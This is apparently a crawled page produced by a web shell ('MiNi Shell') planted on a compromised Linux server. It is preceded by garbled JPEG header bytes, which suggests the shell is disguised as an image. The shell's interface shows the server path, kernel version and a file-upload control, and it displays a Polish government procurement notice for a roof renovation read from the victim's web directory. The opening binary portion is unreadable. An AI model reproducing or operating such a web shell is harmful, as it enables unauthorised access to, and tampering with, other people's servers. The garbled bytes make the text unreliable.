JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221021/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221021/0040313201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Kapitalny remont dachu nad budynkiem administracyjnym </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Okręgowy Ośrodek Wychowawczy w Jerzmanicach-Zdroju</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">OOW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000325400</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jerzmanice-Zdrój 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jerzmanowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">768783858</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kierownik@jerzmanice.oow.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.jerzmanice.zp.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kapitalny remont dachu nad budynkiem administracyjnym </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b3c177b1-50fa-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00403132</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b3c177b1-50fa-11ed-8832-4e4740e186ac <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.jerzmanice.oow.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">www.jerzmanice.oow.gov.pl</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">www.jerzmanice.oow.gov.pl/bip</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i2 rozporządzenia Parlamentu Europejskiego i Rady (UE )2016 / 679 zdnia27kwietnia2016r.wsprawieochronyosóbfizycznychwzwiązkuzprzetwarzaniemdanych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy95/46/WE (ogólnerozporządzenieo ochroniedanych)(Dz.Urz.UEL119 z 04.05.2016, str.1),dalej „RODO”,Zamawiający informuje,że:<br/>1)	Jest	administratorem	danych	osobowych	Wykonawcy	oraz	osób,	których	daneWykonawcaprzekazałwniniejszympostępowaniu;<br/>2)	daneosoboweWykonawcyprzetwarzanebędąnapodstawieart.6ust.1lit.cRODOwceluzwiązanymzpostępowaniemoudzieleniezamówieniapublicznegonazadaniepn.:<br/>,,Remont	dachu	nad	budynkiem	administracyjnym”	prowadzonym	w	trybiepodstawowym;<br/>3)	odbiorcami	danych	osobowych	Wykonawcy	będą	osoby	lubpodmioty,którymudostępnionazostaniedokumentacjapostępowaniawoparciuoart.18ustawyzdnia<br/>11września2019r.–Prawozamówieńpublicznych(Dz.U.z2019r.poz.2019zpóźn.zm.),dalej„ustawaPzp”;<br/> <br/><br/>4)	dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp,przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czastrwaniaumowyprzekracza4lata,okresprzechowywaniaobejmujecałyczastrwaniaumowy;<br/>5)	obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczącychjest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałemwpostępowaniuoudzieleniezamówieniapublicznego;konsekwencjeniepodaniaokreślonych danychwynikajązustawyPzp;<br/>6)	w odniesieniu do danych osobowychWykonawcydecyzjeniebędąpodejmowane wsposóbzautomatyzowany,stosowaniedo art. 22RODO;<br/>7)	Wykonawcaposiada:<br/>−napodstawieart.15RODOprawodostępudodanychosobowychdotyczącychWykonawcy;<br/>−napodstawieart.16RODOprawodosprostowaniadanychosobowych,oileichzmiananieskutkujezmianąwynikupostępowaniaoudzieleniezamówieniapublicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraznienaruszaintegralnościprotokołuorazjegozałączników;<br/>−napodstawieart.18RODOprawożądaniaodadministratoraograniczeniaprzetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art.18ust. 2RODO;<br/>−prawodowniesieniaskargidoPrezesaUrzęduOchronyDanychOsobowych,gdyWykonawcauzna,żeprzetwarzaniejegodanychosobowychnaruszaprzepisyRODO;<br/>8)	Wykonawcynieprzysługuje:<br/>−Wzwiązkuzart.17ust.3lit.b,RODOprawodousunięciadanychosobowych;<br/>−prawodoprzenoszeniadanychosobowych,októrymmowawart.20RODO;<br/>−na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1lit.C RODO.<br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby,której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanieżądania, w szczególności podania nazwy lub daty postępowaniao udzielenie zamówieniapublicznegolubkonkursu.<br/>Skorzystanieprzezosobę,którejdanedotyczą,zuprawnieniadosprostowanialubuzupełnienia danych osobowych, o którym mowa w art.16 rozporządzenia 2016/679, niemożeskutkowaćzmianąwyniku postępowaniao udzieleniezamówieniapublicznego lubkonkursuanizmianąpostanowieńumowy wzakresieniezgodnymzustawą.<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nieograniczaprzetwarzaniadanychosobowychdoczasuzakończeniapostępowania oudzieleniezamówieniapublicznegolubkonkursu.<br/> <br/><br/><br/>WprzypadkudanychosobowychzamieszczonychprzezZamawiającegowBiuletynieZamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 rozporządzenia 2016/679,sąwykonywanewdrodzeżądaniaskierowanegodoZamawiającego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 13 ust. 1 i2 rozporządzenia Parlamentu Europejskiego i Rady (UE )2016 / 679 zdnia27kwietnia2016r.wsprawieochronyosóbfizycznychwzwiązkuzprzetwarzaniemdanych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy95/46/WE (ogólnerozporządzenieo ochroniedanych)(Dz.Urz.UEL119 z 04.05.2016, str.1),dalej „RODO”,Zamawiający informuje,że:<br/>1)	Jest	administratorem	danych	osobowych	Wykonawcy	oraz	osób,	których	daneWykonawcaprzekazałwniniejszympostępowaniu;<br/>2)	daneosoboweWykonawcyprzetwarzanebędąnapodstawieart.6ust.1lit.cRODOwceluzwiązanymzpostępowaniemoudzieleniezamówieniapublicznegonazadaniepn.:<br/>,,Remont	dachu	nad	budynkiem	administracyjnym”	prowadzonym	w	trybiepodstawowym;<br/>3)	odbiorcami	danych	osobowych	Wykonawcy	będą	osoby	lubpodmioty,którymudostępnionazostaniedokumentacjapostępowaniawoparciuoart.18ustawyzdnia<br/>11września2019r.–Prawozamówieńpublicznych(Dz.U.z2019r.poz.2019zpóźn.zm.),dalej„ustawaPzp”;<br/> <br/><br/>4)	dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp,przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czastrwaniaumowyprzekracza4lata,okresprzechowywaniaobejmujecałyczastrwaniaumowy;<br/>5)	obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczącychjest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałemwpostępowaniuoudzieleniezamówieniapublicznego;konsekwencjeniepodaniaokreślonych danychwynikajązustawyPzp;<br/>6)	w odniesieniu do danych osobowychWykonawcydecyzjeniebędąpodejmowane wsposóbzautomatyzowany,stosowaniedo art. 22RODO;<br/>7)	Wykonawcaposiada:<br/>−napodstawieart.15RODOprawodostępudodanychosobowychdotyczącychWykonawcy;<br/>−napodstawieart.16RODOprawodosprostowaniadanychosobowych,oileichzmiananieskutkujezmianąwynikupostępowaniaoudzieleniezamówieniapublicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraznienaruszaintegralnościprotokołuorazjegozałączników;<br/>−napodstawieart.18RODOprawożądaniaodadministratoraograniczeniaprzetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art.18ust. 2RODO;<br/>−prawodowniesieniaskargidoPrezesaUrzęduOchronyDanychOsobowych,gdyWykonawcauzna,żeprzetwarzaniejegodanychosobowychnaruszaprzepisyRODO;<br/>8)	Wykonawcynieprzysługuje:<br/>−Wzwiązkuzart.17ust.3lit.b,RODOprawodousunięciadanychosobowych;<br/>−prawodoprzenoszeniadanychosobowych,októrymmowawart.20RODO;<br/>−na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1lit.C RODO.<br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby,której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanieżądania, w szczególności podania nazwy lub daty postępowaniao udzielenie zamówieniapublicznegolubkonkursu.<br/>Skorzystanieprzezosobę,którejdanedotyczą,zuprawnieniadosprostowanialubuzupełnienia danych osobowych, o którym mowa w art.16 rozporządzenia 2016/679, niemożeskutkowaćzmianąwyniku postępowaniao udzieleniezamówieniapublicznego lubkonkursuanizmianąpostanowieńumowy wzakresieniezgodnymzustawą.<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nieograniczaprzetwarzaniadanychosobowychdoczasuzakończeniapostępowania oudzieleniezamówieniapublicznegolubkonkursu.<br/> <br/><br/><br/>WprzypadkudanychosobowychzamieszczonychprzezZamawiającegowBiuletynieZamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 rozporządzenia 2016/679,sąwykonywanewdrodzeżądaniaskierowanegodoZamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OOW-ADM.261.151.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje: roboty budowlane na zadaniu remontowym :remont kapitalny dachu nad budynkiem administracyjnym.<br/>Zakresprzedsięwzięciaobejmuje:<br/>Dokonanie kapitalnego remontu dachu krytego dachówka ceramiczną w koronkę dwukrotnie, dachówka układana na membranie z folii dachowej zbrojonej- folia dachowa zużyta do wymiany. Więźba dachowa drewniana impregnowana kilkakrotnie impregnowana farbą wapienną, widoczne liczne pęknięcia i duże szczeliny. Dodatkowo występują w licznym stanie ubytki w elementach więźby dachowej, podłoga drewniana biała, widoczne zbutwiałe i spróchniałe deski ślepej podłogi. W dachu znajdują się lukarny w ilości 7 sztuk z oknami drewnianymi do wymiany- w tym zakresie zamawiający zastrzega sobie prawo do skorzystania z prawa opcji.Ponadto w zakresie robót budowlanych przewiduje się m.in.:<br/>- ostrożne rozebranie dachówki- część dachówek zostanie przeznaczona do ponownego wykorzystania;<br/>- demontaż obróbek blacharskich, rynien i rur spustowych na lukarnach,<br/>- rozebranie łat i kontr łat<br/>- demontaż uszkodzonej foli dachowej i montaż nowej,<br/>- usunięcie impregnacji z farby wapiennej i jej ponowna 3 krotna impregnacja,<br/>-ułożenie folii dachowej zbrojonej, kontr łat i łat,<br/>- pokrycie dachówką karpiówką w koronkę z wykorzystaniem dachówki z rozbiórki ( do kalkulacji przyjęto dachówkę dotychczasową w ilości do 75 %),<br/>-uzupełnienie rynien i rur spustowych oraz obróbek blacharskich z blachy tytanowo-cynkowej,<br/>- montaż płotków przeciwśnieżnych, ław kominiarskich, odpowietrzników sanitarnych,<br/>-montaż wyłazów na dach i okien w lukarnach ( w zakresie prawa opcji) <br/>- wymiana elementów drewnianych więźby dachowej- podwaliny, płatwie krokwie, wzmocnienie elementów więźby poprzez nabicie dwustronne lub jednostronne desek o grubości min. 32 mm,<br/>- wymiana elementów ślepej podłogi z desek o grubości 32 mm,<br/>- wykonanie dachów zabezpieczających, zastaw na dachy i pomostów pochyłych komunikacyjnych,<br/>- wykonanie rusztowań jednopomostowych do impregnacji i remontu więźby dachowej,<br/>-demontaż i montaż instalacji odgromowej przy robotach pokrywczych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> zgodnie z SWZ <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny, kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wizja lokalna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zgodnie z SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">zgodnie z SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">zgodnie z SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> zgodnie z SWZ <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> zgodnie z SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> zgodnie z SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> zgodnie z SWZ <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> działanie siły wyższej; pandemia COVID-19 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-10 07:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Okręgowy Ośrodek Wychowawczy w Jerzmanicach-Zdroju ( droga elektroniczna obligatoryjnie)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-10 07:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com